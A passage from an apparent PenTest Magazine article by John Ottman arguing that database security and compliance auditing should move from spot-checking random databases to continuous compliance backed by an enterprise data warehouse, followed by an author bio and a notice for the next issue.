When an audit finds that an enterprise-wide database SRC control process not only exists, but is properly deployed and working, organizations gain assurance that their sensitive data is secure and compliant. In the absence of a continuous compliance program, auditors must establish the state of compliance through a “point-and-shoot” approach. The “point-and-shoot” approach means that IT auditors may select any single database, even at random, to perform a database SRC audit. With so many regulations requiring control process attestation, and with so many database servers to manage, such a scenario leaves the database SRC team totally reactive and near defenseless. Continuous compliance, on the other hand, means auditors abandon the “point-and-shoot” approach and turn their attention to the effectiveness of the database SRC control process as a whole.

A Single Version of the Truth

With the audit scope now centered on the control process as opposed to the audit of a random database instance, our ability to slice and dice database SRC information from across the enterprise and deliver it on demand becomes a critical capability. Database SRC is all about effective reporting, and continuous compliance requires a single version of the truth.

“What is the database asset inventory?” “Where is sensitive data located?” “Which users have access to sensitive data?” “What database vulnerabilities exist this month versus last?” “What policies govern each database?” The operational processes of database SRC are driven by effective reporting as DBA, CISO and risk management teams work cross functionally to secure the enterprise and establish compliance.

Data warehouse functionality thus becomes a critical capability as pertinent information is continually being collected throughout the database SRC lifecycle, and the volume of data collected can become immense. Under a continuous compliance model, auditors seek to understand not only if essential processes exist, but also if these processes are being followed. The data warehouse approach supports these critical audit concerns by providing a broad spectrum of reporting across the entire enterprise scope of databases. By managing and storing the evidentiary foundation of the audit, the data warehouse establishes a single version of the truth for database SRC across the enterprise.

JOHN OTTMAN

John Ottman is Chairman of Solix Technologies, Inc. and also Chairman of Minds, Inc. Previously he was President and CEO of Application Security, Inc. (AppSec) and has over 30 years of experience in the enterprise software industry. Prior to joining AppSec, John was President, Global Operations at Princeton Softech, Inc., a high-growth company and leading provider of enterprise data management software which was acquired by IBM in 2007. John was also Executive Vice President of Corio, Inc. where he led the company from the startup phase, to a successful IPO and ultimately through the acquisition of Corio by IBM. Prior to Corio, John spent 10 years at Oracle Corporation in various field executive roles including Group Vice President, Industrial Sector. Before Oracle he worked at Wang Laboratories, Inc. for eight years.


In the Upcoming Issue of PenTest Magazine: Exploitation Frameworks

Available to download on September 3rd

If you would like to contact the PenTest team, just send an email to [email protected] or [email protected]. We will reply a.s.a.p. PenTest Magazine has the right to change the content of the next Magazine Edition.
